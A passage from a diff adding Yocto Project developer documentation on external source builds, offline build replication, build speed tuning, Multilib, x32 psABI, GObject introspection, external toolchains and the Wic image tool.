+   -  ``state-diff-machines.sh``*:* You can find this tool in the
+      ``scripts`` directory of the Source Repositories. See the comments
+      in the script for information on how to use the tool.
+
+   -  *BitBake's "-S printdiff" Option:* Using this option causes
+      BitBake to try to establish the closest signature match it can
+      (e.g. in the shared state cache) and then run ``bitbake-diffsigs``
+      over the matches to determine the stamps and delta where these two
+      stamp trees diverge.
+
+Building Software from an External Source
+-----------------------------------------
+
+By default, the OpenEmbedded build system uses the
+:term:`Build Directory` when building source
+code. The build process involves fetching the source files, unpacking
+them, and then patching them if necessary before the build takes place.
+
+Situations exist where you might want to build software from source
+files that are external to and thus outside of the OpenEmbedded build
+system. For example, suppose you have a project that includes a new BSP
+with a heavily customized kernel. And, you want to minimize exposing the
+build system to the development team so that they can focus on their
+project and maintain everyone's workflow as much as possible. In this
+case, you want a kernel source directory on the development machine
+where the development occurs. You want the recipe's
+:term:`SRC_URI` variable to point to
+the external directory and use it as is, not copy it.
+
+To build from software that comes from an external source, all you need
+to do is inherit the
+:ref:`externalsrc <ref-classes-externalsrc>` class
+and then set the
+:term:`EXTERNALSRC` variable to
+point to your external source code. Here are the statements to put in
+your ``local.conf`` file:
+::
+
+   INHERIT += "externalsrc"
+   EXTERNALSRC_pn-myrecipe = "path-to-your-source-tree"
+
+This next example shows how to accomplish the same thing by setting
+``EXTERNALSRC`` in the recipe itself or in the recipe's append file:
+::
+
+   EXTERNALSRC = "path"
+   EXTERNALSRC_BUILD = "path"
+
+.. note::
+
+   In order for these settings to take effect, you must globally or
+   locally inherit the :ref:`externalsrc <ref-classes-externalsrc>`
+   class.
+
+By default, ``externalsrc.bbclass`` builds the source code in a
+directory separate from the external source directory as specified by
+:term:`EXTERNALSRC`. If you need
+to have the source built in the same directory in which it resides, or
+some other nominated directory, you can set
+:term:`EXTERNALSRC_BUILD`
+to point to that directory:
+::
+
+   EXTERNALSRC_BUILD_pn-myrecipe = "path-to-your-source-tree"
+
+Replicating a Build Offline
+---------------------------
+
+It can be useful to take a "snapshot" of upstream sources used in a
+build and then use that "snapshot" later to replicate the build offline.
+To do so, you need to first prepare and populate your downloads
+directory your "snapshot" of files. Once your downloads directory is
+ready, you can use it at any time and from any machine to replicate your
+build.
+
+Follow these steps to populate your Downloads directory:
+
+1. *Create a Clean Downloads Directory:* Start with an empty downloads
+   directory (:term:`DL_DIR`). You
+   start with an empty downloads directory by either removing the files
+   in the existing directory or by setting ``DL_DIR`` to point to either
+   an empty location or one that does not yet exist.
+
+2. *Generate Tarballs of the Source Git Repositories:* Edit your
+   ``local.conf`` configuration file as follows:
+   ::
+
+      DL_DIR = "/home/your-download-dir/"
+      BB_GENERATE_MIRROR_TARBALLS = "1"
+
+   During
+   the fetch process in the next step, BitBake gathers the source files
+   and creates tarballs in the directory pointed to by ``DL_DIR``. See
+   the
+   :term:`BB_GENERATE_MIRROR_TARBALLS`
+   variable for more information.
+
+3. *Populate Your Downloads Directory Without Building:* Use BitBake to
+   fetch your sources but inhibit the build:
+   ::
+
+      $ bitbake target --runonly=fetch
+
+   The downloads directory (i.e. ``${DL_DIR}``) now has
+   a "snapshot" of the source files in the form of tarballs, which can
+   be used for the build.
+
+4. *Optionally Remove Any Git or other SCM Subdirectories From the
+   Downloads Directory:* If you want, you can clean up your downloads
+   directory by removing any Git or other Source Control Management
+   (SCM) subdirectories such as ``${DL_DIR}/git2/*``. The tarballs
+   already contain these subdirectories.
+
+Once your downloads directory has everything it needs regarding source
+files, you can create your "own-mirror" and build your target.
+Understand that you can use the files to build the target offline from
+any machine and at any time.
+
+Follow these steps to build your target using the files in the downloads
+directory:
+
+1. *Using Local Files Only:* Inside your ``local.conf`` file, add the
+   :term:`SOURCE_MIRROR_URL`
+   variable, inherit the
+   :ref:`own-mirrors <ref-classes-own-mirrors>`
+   class, and use the
+   :term:`bitbake:BB_NO_NETWORK`
+   variable to your ``local.conf``.
+   ::
+
+      SOURCE_MIRROR_URL ?= "file:///home/your-download-dir/"
+      INHERIT += "own-mirrors"
+      BB_NO_NETWORK = "1"
+
+   The ``SOURCE_MIRROR_URL`` and ``own-mirror``
+   class set up the system to use the downloads directory as your "own
+   mirror". Using the ``BB_NO_NETWORK`` variable makes sure that
+   BitBake's fetching process in step 3 stays local, which means files
+   from your "own-mirror" are used.
+
+2. *Start With a Clean Build:* You can start with a clean build by
+   removing the
+   ``${``\ :term:`TMPDIR`\ ``}``
+   directory or using a new :term:`Build Directory`.
+
+3. *Build Your Target:* Use BitBake to build your target:
+   ::
+
+      $ bitbake target
+
+   The build completes using the known local "snapshot" of source
+   files from your mirror. The resulting tarballs for your "snapshot" of
+   source files are in the downloads directory.
+
+   .. note::
+
+      The offline build does not work if recipes attempt to find the
+      latest version of software by setting
+      :term:`SRCREV` to
+      ``${``\ :term:`AUTOREV`\ ``}``:
+      ::
+
+         SRCREV = "${AUTOREV}"
+
+      When a recipe sets ``SRCREV`` to
+      ``${AUTOREV}``, the build system accesses the network in an
+      attempt to determine the latest version of software from the SCM.
+      Typically, recipes that use ``AUTOREV`` are custom or modified
+      recipes. Recipes that reside in public repositories usually do not
+      use ``AUTOREV``.
+
+      If you do have recipes that use ``AUTOREV``, you can take steps to
+      still use the recipes in an offline build. Do the following:
+
+      1. Use a configuration generated by enabling `build
+         history <#maintaining-build-output-quality>`__.
+
+      2. Use the ``buildhistory-collect-srcrevs`` command to collect the
+         stored ``SRCREV`` values from the build's history. For more
+         information on collecting these values, see the "`Build History
+         Package Information <#build-history-package-information>`__"
+         section.
+
+      3. Once you have the correct source revisions, you can modify
+         those recipes to to set ``SRCREV`` to specific versions of the
+         software.
+
+Speeding Up a Build
+===================
+
+Build time can be an issue. By default, the build system uses simple
+controls to try and maximize build efficiency. In general, the default
+settings for all the following variables result in the most efficient
+build times when dealing with single socket systems (i.e. a single CPU).
+If you have multiple CPUs, you might try increasing the default values
+to gain more speed. See the descriptions in the glossary for each
+variable for more information:
+
+-  :term:`BB_NUMBER_THREADS`:
+   The maximum number of threads BitBake simultaneously executes.
+
+-  :term:`bitbake:BB_NUMBER_PARSE_THREADS`:
+   The number of threads BitBake uses during parsing.
+
+-  :term:`PARALLEL_MAKE`: Extra
+   options passed to the ``make`` command during the
+   :ref:`ref-tasks-compile` task in
+   order to specify parallel compilation on the local build host.
+
+-  :term:`PARALLEL_MAKEINST`:
+   Extra options passed to the ``make`` command during the
+   :ref:`ref-tasks-install` task in
+   order to specify parallel installation on the local build host.
+
+As mentioned, these variables all scale to the number of processor cores
+available on the build system. For single socket systems, this
+auto-scaling ensures that the build system fundamentally takes advantage
+of potential parallel operations during the build based on the build
+machine's capabilities.
+
+Following are additional factors that can affect build speed:
+
+-  File system type: The file system type that the build is being
+   performed on can also influence performance. Using ``ext4`` is
+   recommended as compared to ``ext2`` and ``ext3`` due to ``ext4``
+   improved features such as extents.
+
+-  Disabling the updating of access time using ``noatime``: The
+   ``noatime`` mount option prevents the build system from updating file
+   and directory access times.
+
+-  Setting a longer commit: Using the "commit=" mount option increases
+   the interval in seconds between disk cache writes. Changing this
+   interval from the five second default to something longer increases
+   the risk of data loss but decreases the need to write to the disk,
+   thus increasing the build performance.
+
+-  Choosing the packaging backend: Of the available packaging backends,
+   IPK is the fastest. Additionally, selecting a singular packaging
+   backend also helps.
+
+-  Using ``tmpfs`` for :term:`TMPDIR`
+   as a temporary file system: While this can help speed up the build,
+   the benefits are limited due to the compiler using ``-pipe``. The
+   build system goes to some lengths to avoid ``sync()`` calls into the
+   file system on the principle that if there was a significant failure,
+   the :term:`Build Directory`
+   contents could easily be rebuilt.
+
+-  Inheriting the
+   :ref:`rm_work <ref-classes-rm-work>` class:
+   Inheriting this class has shown to speed up builds due to
+   significantly lower amounts of data stored in the data cache as well
+   as on disk. Inheriting this class also makes cleanup of
+   :term:`TMPDIR` faster, at the
+   expense of being easily able to dive into the source code. File
+   system maintainers have recommended that the fastest way to clean up
+   large numbers of files is to reformat partitions rather than delete
+   files due to the linear nature of partitions. This, of course,
+   assumes you structure the disk partitions and file systems in a way
+   that this is practical.
+
+Aside from the previous list, you should keep some trade offs in mind
+that can help you speed up the build:
+
+-  Remove items from
+   :term:`DISTRO_FEATURES`
+   that you might not need.
+
+-  Exclude debug symbols and other debug information: If you do not need
+   these symbols and other debug information, disabling the ``*-dbg``
+   package generation can speed up the build. You can disable this
+   generation by setting the
+   :term:`INHIBIT_PACKAGE_DEBUG_SPLIT`
+   variable to "1".
+
+-  Disable static library generation for recipes derived from
+   ``autoconf`` or ``libtool``: Following is an example showing how to
+   disable static libraries and still provide an override to handle
+   exceptions:
+   ::
+
+      STATICLIBCONF = "--disable-static"
+      STATICLIBCONF_sqlite3-native = ""
+      EXTRA_OECONF += "${STATICLIBCONF}"
+
+   .. note::
+
+      -  Some recipes need static libraries in order to work correctly
+         (e.g. ``pseudo-native`` needs ``sqlite3-native``). Overrides,
+         as in the previous example, account for these kinds of
+         exceptions.
+
+      -  Some packages have packaging code that assumes the presence of
+         the static libraries. If so, you might need to exclude them as
+         well.
+
+.. _platdev-working-with-libraries:
+
+Working With Libraries
+======================
+
+Libraries are an integral part of your system. This section describes
+some common practices you might find helpful when working with libraries
+to build your system:
+
+-  `How to include static library
+   files <#including-static-library-files>`__
+
+-  `How to use the Multilib feature to combine multiple versions of
+   library files into a single
+   image <#combining-multiple-versions-library-files-into-one-image>`__
+
+-  `How to install multiple versions of the same library in parallel on
+   the same
+   system <#installing-multiple-versions-of-the-same-library>`__
+
+Including Static Library Files
+------------------------------
+
+If you are building a library and the library offers static linking, you
+can control which static library files (``*.a`` files) get included in
+the built library.
+
+The :term:`PACKAGES` and
+:term:`FILES_* <FILES>` variables in the
+``meta/conf/bitbake.conf`` configuration file define how files installed
+by the ``do_install`` task are packaged. By default, the ``PACKAGES``
+variable includes ``${PN}-staticdev``, which represents all static
+library files.
+
+.. note::
+
+   Some previously released versions of the Yocto Project defined the
+   static library files through ``${PN}-dev``.
+
+Following is part of the BitBake configuration file, where you can see
+how the static library files are defined:
+::
+
+   PACKAGE_BEFORE_PN ?= ""
+   PACKAGES = "${PN}-dbg ${PN}-staticdev ${PN}-dev ${PN}-doc ${PN}-locale ${PACKAGE_BEFORE_PN} ${PN}"
+   PACKAGES_DYNAMIC = "^${PN}-locale-.*"
+   FILES = ""
+
+   FILES_${PN} = "${bindir}/* ${sbindir}/* ${libexecdir}/* ${libdir}/lib*${SOLIBS} \
+               ${sysconfdir} ${sharedstatedir} ${localstatedir} \
+               ${base_bindir}/* ${base_sbindir}/* \
+               ${base_libdir}/*${SOLIBS} \
+               ${base_prefix}/lib/udev/rules.d ${prefix}/lib/udev/rules.d \
+               ${datadir}/${BPN} ${libdir}/${BPN}/* \
+               ${datadir}/pixmaps ${datadir}/applications \
+               ${datadir}/idl ${datadir}/omf ${datadir}/sounds \
+               ${libdir}/bonobo/servers"
+
+   FILES_${PN}-bin = "${bindir}/* ${sbindir}/*"
+
+   FILES_${PN}-doc = "${docdir} ${mandir} ${infodir} ${datadir}/gtk-doc \
+               ${datadir}/gnome/help"
+   SECTION_${PN}-doc = "doc"
+
+   FILES_SOLIBSDEV ?= "${base_libdir}/lib*${SOLIBSDEV} ${libdir}/lib*${SOLIBSDEV}"
+   FILES_${PN}-dev = "${includedir} ${FILES_SOLIBSDEV} ${libdir}/*.la \
+                   ${libdir}/*.o ${libdir}/pkgconfig ${datadir}/pkgconfig \
+                   ${datadir}/aclocal ${base_libdir}/*.o \
+                   ${libdir}/${BPN}/*.la ${base_libdir}/*.la"
+   SECTION_${PN}-dev = "devel"
+   ALLOW_EMPTY_${PN}-dev = "1"
+   RDEPENDS_${PN}-dev = "${PN} (= ${EXTENDPKGV})"
+
+   FILES_${PN}-staticdev = "${libdir}/*.a ${base_libdir}/*.a ${libdir}/${BPN}/*.a"
+   SECTION_${PN}-staticdev = "devel"
+   RDEPENDS_${PN}-staticdev = "${PN}-dev (= ${EXTENDPKGV})"
+
+.. _combining-multiple-versions-library-files-into-one-image:
+
+Combining Multiple Versions of Library Files into One Image
+-----------------------------------------------------------
+
+The build system offers the ability to build libraries with different
+target optimizations or architecture formats and combine these together
+into one system image. You can link different binaries in the image
+against the different libraries as needed for specific use cases. This
+feature is called "Multilib".
+
+An example would be where you have most of a system compiled in 32-bit
+mode using 32-bit libraries, but you have something large, like a
+database engine, that needs to be a 64-bit application and uses 64-bit
+libraries. Multilib allows you to get the best of both 32-bit and 64-bit
+libraries.
+
+While the Multilib feature is most commonly used for 32 and 64-bit
+differences, the approach the build system uses facilitates different
+target optimizations. You could compile some binaries to use one set of
+libraries and other binaries to use a different set of libraries. The
+libraries could differ in architecture, compiler options, or other
+optimizations.
+
+Several examples exist in the ``meta-skeleton`` layer found in the
+:term:`Source Directory`:
+
+-  ``conf/multilib-example.conf`` configuration file
+
+-  ``conf/multilib-example2.conf`` configuration file
+
+-  ``recipes-multilib/images/core-image-multilib-example.bb`` recipe
+
+Preparing to Use Multilib
+~~~~~~~~~~~~~~~~~~~~~~~~~
+
+User-specific requirements drive the Multilib feature. Consequently,
+there is no one "out-of-the-box" configuration that likely exists to
+meet your needs.
+
+In order to enable Multilib, you first need to ensure your recipe is
+extended to support multiple libraries. Many standard recipes are
+already extended and support multiple libraries. You can check in the
+``meta/conf/multilib.conf`` configuration file in the
+:term:`Source Directory` to see how this is
+done using the
+:term:`BBCLASSEXTEND` variable.
+Eventually, all recipes will be covered and this list will not be
+needed.
+
+For the most part, the Multilib class extension works automatically to
+extend the package name from ``${PN}`` to ``${MLPREFIX}${PN}``, where
+``MLPREFIX`` is the particular multilib (e.g. "lib32-" or "lib64-").
+Standard variables such as
+:term:`DEPENDS`,
+:term:`RDEPENDS`,
+:term:`RPROVIDES`,
+:term:`RRECOMMENDS`,
+:term:`PACKAGES`, and
+:term:`PACKAGES_DYNAMIC` are
+automatically extended by the system. If you are extending any manual
+code in the recipe, you can use the ``${MLPREFIX}`` variable to ensure
+those names are extended correctly. This automatic extension code
+resides in ``multilib.bbclass``.
+
+Using Multilib
+~~~~~~~~~~~~~~
+
+After you have set up the recipes, you need to define the actual
+combination of multiple libraries you want to build. You accomplish this
+through your ``local.conf`` configuration file in the
+:term:`Build Directory`. An example
+configuration would be as follows:
+::
+
+   MACHINE = "qemux86-64"
+   require conf/multilib.conf
+   MULTILIBS = "multilib:lib32"
+   DEFAULTTUNE_virtclass-multilib-lib32 = "x86"
+   IMAGE_INSTALL_append = " lib32-glib-2.0"
+
+This example enables an additional library named
+``lib32`` alongside the normal target packages. When combining these
+"lib32" alternatives, the example uses "x86" for tuning. For information
+on this particular tuning, see
+``meta/conf/machine/include/ia32/arch-ia32.inc``.
+
+The example then includes ``lib32-glib-2.0`` in all the images, which
+illustrates one method of including a multiple library dependency. You
+can use a normal image build to include this dependency, for example:
+::
+
+   $ bitbake core-image-sato
+
+You can also build Multilib packages
+specifically with a command like this:
+::
+
+   $ bitbake lib32-glib-2.0
+
+Additional Implementation Details
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Generic implementation details as well as details that are specific to
+package management systems exist. Following are implementation details
+that exist regardless of the package management system:
+
+-  The typical convention used for the class extension code as used by
+   Multilib assumes that all package names specified in
+   :term:`PACKAGES` that contain
+   ``${PN}`` have ``${PN}`` at the start of the name. When that
+   convention is not followed and ``${PN}`` appears at the middle or the
+   end of a name, problems occur.
+
+-  The :term:`TARGET_VENDOR`
+   value under Multilib will be extended to "-vendormlmultilib" (e.g.
+   "-pokymllib32" for a "lib32" Multilib with Poky). The reason for this
+   slightly unwieldy contraction is that any "-" characters in the
+   vendor string presently break Autoconf's ``config.sub``, and other
+   separators are problematic for different reasons.
+
+For the RPM Package Management System, the following implementation
+details exist:
+
+-  A unique architecture is defined for the Multilib packages, along
+   with creating a unique deploy folder under ``tmp/deploy/rpm`` in the
+   :term:`Build Directory`. For
+   example, consider ``lib32`` in a ``qemux86-64`` image. The possible
+   architectures in the system are "all", "qemux86_64",
+   "lib32_qemux86_64", and "lib32_x86".
+
+-  The ``${MLPREFIX}`` variable is stripped from ``${PN}`` during RPM
+   packaging. The naming for a normal RPM package and a Multilib RPM
+   package in a ``qemux86-64`` system resolves to something similar to
+   ``bash-4.1-r2.x86_64.rpm`` and ``bash-4.1.r2.lib32_x86.rpm``,
+   respectively.
+
+-  When installing a Multilib image, the RPM backend first installs the
+   base image and then installs the Multilib libraries.
+
+-  The build system relies on RPM to resolve the identical files in the
+   two (or more) Multilib packages.
+
+For the IPK Package Management System, the following implementation
+details exist:
+
+-  The ``${MLPREFIX}`` is not stripped from ``${PN}`` during IPK
+   packaging. The naming for a normal RPM package and a Multilib IPK
+   package in a ``qemux86-64`` system resolves to something like
+   ``bash_4.1-r2.x86_64.ipk`` and ``lib32-bash_4.1-rw_x86.ipk``,
+   respectively.
+
+-  The IPK deploy folder is not modified with ``${MLPREFIX}`` because
+   packages with and without the Multilib feature can exist in the same
+   folder due to the ``${PN}`` differences.
+
+-  IPK defines a sanity check for Multilib installation using certain
+   rules for file comparison, overridden, etc.
+
+Installing Multiple Versions of the Same Library
+------------------------------------------------
+
+Situations can exist where you need to install and use multiple versions
+of the same library on the same system at the same time. These
+situations almost always exist when a library API changes and you have
+multiple pieces of software that depend on the separate versions of the
+library. To accommodate these situations, you can install multiple
+versions of the same library in parallel on the same system.
+
+The process is straightforward as long as the libraries use proper
+versioning. With properly versioned libraries, all you need to do to
+individually specify the libraries is create separate, appropriately
+named recipes where the :term:`PN` part of
+the name includes a portion that differentiates each library version
+(e.g. the major part of the version number). Thus, instead of having a
+single recipe that loads one version of a library (e.g. ``clutter``),
+you provide multiple recipes that result in different versions of the
+libraries you want. As an example, the following two recipes would allow
+the two separate versions of the ``clutter`` library to co-exist on the
+same system:
+
+.. code-block:: none
+
+   clutter-1.6_1.6.20.bb
+   clutter-1.8_1.8.4.bb
+
+Additionally, if
+you have other recipes that depend on a given library, you need to use
+the :term:`DEPENDS` variable to
+create the dependency. Continuing with the same example, if you want to
+have a recipe depend on the 1.8 version of the ``clutter`` library, use
+the following in your recipe:
+::
+
+   DEPENDS = "clutter-1.8"
+
+Using x32 psABI
+===============
+
+x32 processor-specific Application Binary Interface (`x32
+psABI <https://software.intel.com/en-us/node/628948>`__) is a native
+32-bit processor-specific ABI for Intel 64 (x86-64) architectures. An
+ABI defines the calling conventions between functions in a processing
+environment. The interface determines what registers are used and what
+the sizes are for various C data types.
+
+Some processing environments prefer using 32-bit applications even when
+running on Intel 64-bit platforms. Consider the i386 psABI, which is a
+very old 32-bit ABI for Intel 64-bit platforms. The i386 psABI does not
+provide efficient use and access of the Intel 64-bit processor
+resources, leaving the system underutilized. Now consider the x86_64
+psABI. This ABI is newer and uses 64-bits for data sizes and program
+pointers. The extra bits increase the footprint size of the programs,
+libraries, and also increases the memory and file system size
+requirements. Executing under the x32 psABI enables user programs to
+utilize CPU and system resources more efficiently while keeping the
+memory footprint of the applications low. Extra bits are used for
+registers but not for addressing mechanisms.
+
+The Yocto Project supports the final specifications of x32 psABI as
+follows:
+
+-  You can create packages and images in x32 psABI format on x86_64
+   architecture targets.
+
+-  You can successfully build recipes with the x32 toolchain.
+
+-  You can create and boot ``core-image-minimal`` and
+   ``core-image-sato`` images.
+
+-  RPM Package Manager (RPM) support exists for x32 binaries.
+
+-  Support for large images exists.
+
+To use the x32 psABI, you need to edit your ``conf/local.conf``
+configuration file as follows:
+::
+
+   MACHINE = "qemux86-64"
+   DEFAULTTUNE = "x86-64-x32"
+   baselib = "${@d.getVar('BASE_LIB_tune-' + (d.getVar('DEFAULTTUNE') \
+       or 'INVALID')) or 'lib'}"
+
+Once you have set
+up your configuration file, use BitBake to build an image that supports
+the x32 psABI. Here is an example:
+::
+
+   $ bitbake core-image-sato
+
+Enabling GObject Introspection Support
+======================================
+
+`GObject
+introspection <https://wiki.gnome.org/Projects/GObjectIntrospection>`__
+is the standard mechanism for accessing GObject-based software from
+runtime environments. GObject is a feature of the GLib library that
+provides an object framework for the GNOME desktop and related software.
+GObject Introspection adds information to GObject that allows objects
+created within it to be represented across different programming
+languages. If you want to construct GStreamer pipelines using Python, or
+control UPnP infrastructure using Javascript and GUPnP, GObject
+introspection is the only way to do it.
+
+This section describes the Yocto Project support for generating and
+packaging GObject introspection data. GObject introspection data is a
+description of the API provided by libraries built on top of GLib
+framework, and, in particular, that framework's GObject mechanism.
+GObject Introspection Repository (GIR) files go to ``-dev`` packages,
+``typelib`` files go to main packages as they are packaged together with
+libraries that are introspected.
+
+The data is generated when building such a library, by linking the
+library with a small executable binary that asks the library to describe
+itself, and then executing the binary and processing its output.
+
+Generating this data in a cross-compilation environment is difficult
+because the library is produced for the target architecture, but its
+code needs to be executed on the build host. This problem is solved with
+the OpenEmbedded build system by running the code through QEMU, which
+allows precisely that. Unfortunately, QEMU does not always work
+perfectly as mentioned in the "`Known Issues <#known-issues>`__"
+section.
+
+Enabling the Generation of Introspection Data
+---------------------------------------------
+
+Enabling the generation of introspection data (GIR files) in your
+library package involves the following:
+
+1. Inherit the
+   :ref:`gobject-introspection <ref-classes-gobject-introspection>`
+   class.
+
+2. Make sure introspection is not disabled anywhere in the recipe or
+   from anything the recipe includes. Also, make sure that
+   "gobject-introspection-data" is not in
+   :term:`DISTRO_FEATURES_BACKFILL_CONSIDERED`
+   and that "qemu-usermode" is not in
+   :term:`MACHINE_FEATURES_BACKFILL_CONSIDERED`.
+   If either of these conditions exist, nothing will happen.
+
+3. Try to build the recipe. If you encounter build errors that look like
+   something is unable to find ``.so`` libraries, check where these
+   libraries are located in the source tree and add the following to the
+   recipe:
+   ::
+
+      GIR_EXTRA_LIBS_PATH = "${B}/something/.libs"
+
+   .. note::
+
+      See recipes in the ``oe-core`` repository that use that
+      ``GIR_EXTRA_LIBS_PATH`` variable as an example.
+
+4. Look for any other errors, which probably mean that introspection
+   support in a package is not entirely standard, and thus breaks down
+   in a cross-compilation environment. For such cases, custom-made fixes
+   are needed. A good place to ask and receive help in these cases is
+   the :ref:`Yocto Project mailing
+   lists <resources-mailinglist>`.
+
+.. note::
+
+   Using a library that no longer builds against the latest Yocto
+   Project release and prints introspection related errors is a good
+   candidate for the previous procedure.
+
+Disabling the Generation of Introspection Data
+----------------------------------------------
+
+You might find that you do not want to generate introspection data. Or,
+perhaps QEMU does not work on your build host and target architecture
+combination. If so, you can use either of the following methods to
+disable GIR file generations:
+
+-  Add the following to your distro configuration:
+   ::
+
+      DISTRO_FEATURES_BACKFILL_CONSIDERED = "gobject-introspection-data"
+
+   Adding this statement disables generating introspection data using
+   QEMU but will still enable building introspection tools and libraries
+   (i.e. building them does not require the use of QEMU).
+
+-  Add the following to your machine configuration:
+   ::
+
+      MACHINE_FEATURES_BACKFILL_CONSIDERED = "qemu-usermode"
+
+   Adding this statement disables the use of QEMU when building packages for your
+   machine. Currently, this feature is used only by introspection
+   recipes and has the same effect as the previously described option.
+
+   .. note::
+
+      Future releases of the Yocto Project might have other features
+      affected by this option.
+
+If you disable introspection data, you can still obtain it through other
+means such as copying the data from a suitable sysroot, or by generating
+it on the target hardware. The OpenEmbedded build system does not
+currently provide specific support for these techniques.
+
+Testing that Introspection Works in an Image
+--------------------------------------------
+
+Use the following procedure to test if generating introspection data is
+working in an image:
+
+1. Make sure that "gobject-introspection-data" is not in
+   :term:`DISTRO_FEATURES_BACKFILL_CONSIDERED`
+   and that "qemu-usermode" is not in
+   :term:`MACHINE_FEATURES_BACKFILL_CONSIDERED`.
+
+2. Build ``core-image-sato``.
+
+3. Launch a Terminal and then start Python in the terminal.
+
+4. Enter the following in the terminal:
+   ::
+
+      >>> from gi.repository import GLib
+      >>> GLib.get_host_name()
+
+5. For something a little more advanced, enter the following see:
+   https://python-gtk-3-tutorial.readthedocs.io/en/latest/introduction.html
+
+Known Issues
+------------
+
+The following know issues exist for GObject Introspection Support:
+
+-  ``qemu-ppc64`` immediately crashes. Consequently, you cannot build
+   introspection data on that architecture.
+
+-  x32 is not supported by QEMU. Consequently, introspection data is
+   disabled.
+
+-  musl causes transient GLib binaries to crash on assertion failures.
+   Consequently, generating introspection data is disabled.
+
+-  Because QEMU is not able to run the binaries correctly, introspection
+   is disabled for some specific packages under specific architectures
+   (e.g. ``gcr``, ``libsecret``, and ``webkit``).
+
+-  QEMU usermode might not work properly when running 64-bit binaries
+   under 32-bit host machines. In particular, "qemumips64" is known to
+   not work under i686.
+
+.. _dev-optionally-using-an-external-toolchain:
+
+Optionally Using an External Toolchain
+======================================
+
+You might want to use an external toolchain as part of your development.
+If this is the case, the fundamental steps you need to accomplish are as
+follows:
+
+-  Understand where the installed toolchain resides. For cases where you
+   need to build the external toolchain, you would need to take separate
+   steps to build and install the toolchain.
+
+-  Make sure you add the layer that contains the toolchain to your
+   ``bblayers.conf`` file through the
+   :term:`BBLAYERS` variable.
+
+-  Set the ``EXTERNAL_TOOLCHAIN`` variable in your ``local.conf`` file
+   to the location in which you installed the toolchain.
+
+A good example of an external toolchain used with the Yocto Project is
+Mentor Graphics Sourcery G++ Toolchain. You can see information on how
+to use that particular layer in the ``README`` file at
+https://github.com/MentorEmbedded/meta-sourcery/. You can find
+further information by reading about the
+:term:`TCMODE` variable in the Yocto
+Project Reference Manual's variable glossary.
+
+Creating Partitioned Images Using Wic
+=====================================
+
+Creating an image for a particular hardware target using the
+OpenEmbedded build system does not necessarily mean you can boot that
+image as is on your device. Physical devices accept and boot images in
+various ways depending on the specifics of the device. Usually,
+information about the hardware can tell you what image format the device
+requires. Should your device require multiple partitions on an SD card,
+flash, or an HDD, you can use the OpenEmbedded Image Creator, Wic, to
+create the properly partitioned image.
+
+The ``wic`` command generates partitioned images from existing
+OpenEmbedded build artifacts. Image generation is driven by partitioning
+commands contained in an Openembedded kickstart file (``.wks``)
+specified either directly on the command line or as one of a selection
+of canned kickstart files as shown with the ``wic list images`` command
+in the "`Using an Existing Kickstart
+File <#using-a-provided-kickstart-file>`__" section. When you apply the
+command to a given set of build artifacts, the result is an image or set
+of images that can be directly written onto media and used on a
+particular system.
+
+.. note::
+
+   For a kickstart file reference, see the
+   ":ref:`ref-manual/ref-kickstart:openembedded kickstart (\`\`.wks\`\`) reference`"
+   Chapter in the Yocto Project Reference Manual.
+
+The ``wic`` command and the infrastructure it is based on is by
+definition incomplete. The purpose of the command is to allow the
+generation of customized images, and as such, was designed to be
+completely extensible through a plugin interface. See the "`Using the
+Wic PlugIn Interface <#wic-using-the-wic-plugin-interface>`__" section
+for information on these plugins.
+
+This section provides some background information on Wic, describes what
+you need to have in place to run the tool, provides instruction on how
+to use the Wic utility, provides information on using the Wic plugins
+interface, and provides several examples that show how to use Wic.
+
+.. _wic-background:
+
+Background
+----------
+
+This section provides some background on the Wic utility. While none of
+this information is required to use Wic, you might find it interesting.
+
+-  The name "Wic" is derived from OpenEmbedded Image Creator (oeic). The
+   "oe" diphthong in "oeic" was promoted to the letter "w", because
+   "oeic" is both difficult to remember and to pronounce.
+
+-  Wic is loosely based on the Meego Image Creator (``mic``) framework.
+   The Wic implementation has been heavily modified to make direct use
+   of OpenEmbedded build artifacts instead of package installation and
+   configuration, which are already incorporated within the OpenEmbedded
+   artifacts.
+
+-  Wic is a completely independent standalone utility that initially
+   provides easier-to-use and more flexible replacements for an existing
+   functionality in OE-Core's
+   :ref:`image-live <ref-classes-image-live>`
+   class. The difference between Wic and those examples is that with Wic
+   the functionality of those scripts is implemented by a
+   general-purpose partitioning language, which is based on Redhat
+   kickstart syntax.
+
+.. _wic-requirements:
+
+Requirements
+------------
+
+In order to use the Wic utility with the OpenEmbedded Build system, your
+system needs to meet the following requirements:
+
+-  The Linux distribution on your development host must support the
+   Yocto Project. See the ":ref:`detailed-supported-distros`"
+   section in the Yocto Project Reference Manual for the list of
+   distributions that support the Yocto Project.
+
+-  The standard system utilities, such as ``cp``, must be installed on
+   your development host system.
+
+-  You must have sourced the build environment setup script (i.e.
+   :ref:`structure-core-script`) found in the
+   :term:`Build Directory`.
+
+-  You need to have the build artifacts already available, which
+   typically means that you must have already created an image using the
+   Openembedded build system (e.g. ``core-image-minimal``). While it
+   might seem redundant to generate an image in order to create an image
+   using Wic, the current version of Wic requires the artifacts in the
+   form generated by the OpenEmbedded build system.
+
+-  You must build several native tools, which are built to run on the
+   build system:
+   ::
+
+      $ bitbake parted-native dosfstools-native mtools-native
+
+-  Include "wic" as part of the
+   :term:`IMAGE_FSTYPES`
+   variable.
+
+-  Include the name of the :ref:`wic kickstart file <openembedded-kickstart-wks-reference>`
+   as part of the :term:`WKS_FILE` variable
+
+.. _wic-getting-help:
+
+Getting Help
+------------
+
+You can get general help for the ``wic`` command by entering the ``wic``
+command by itself or by entering the command with a help argument as
+follows:
+::
+
+   $ wic -h
+   $ wic --help
+   $ wic help
+
+Currently, Wic supports seven commands: ``cp``, ``create``, ``help``,
+``list``, ``ls``, ``rm``, and ``write``. You can get help for all these
+commands except "help" by using the following form:
+::
+
+   $ wic help command
+
+For example, the following command returns help for the ``write``
+command:
+::
+
+   $ wic help write
+
+Wic supports help for three topics: ``overview``, ``plugins``, and
+``kickstart``. You can get help for any topic using the following form:
+::
+
+   $ wic help topic
+
+For example, the following returns overview help for Wic:
+::
+
+   $ wic help overview
+
+One additional level of help exists for Wic. You can get help on
+individual images through the ``list`` command. You can use the ``list``
+command to return the available Wic images as follows:
+::
+
+   $ wic list images
+     genericx86                    		Create an EFI disk image for genericx86*
+     beaglebone-yocto              		Create SD card image for Beaglebone
+     edgerouter                    		Create SD card image for Edgerouter
+     qemux86-directdisk            		Create a qemu machine 'pcbios' direct disk image
+     directdisk-gpt                		Create a 'pcbios' direct disk image
+     mkefidisk                     		Create an EFI disk image
+     directdisk                    		Create a 'pcbios' direct disk image
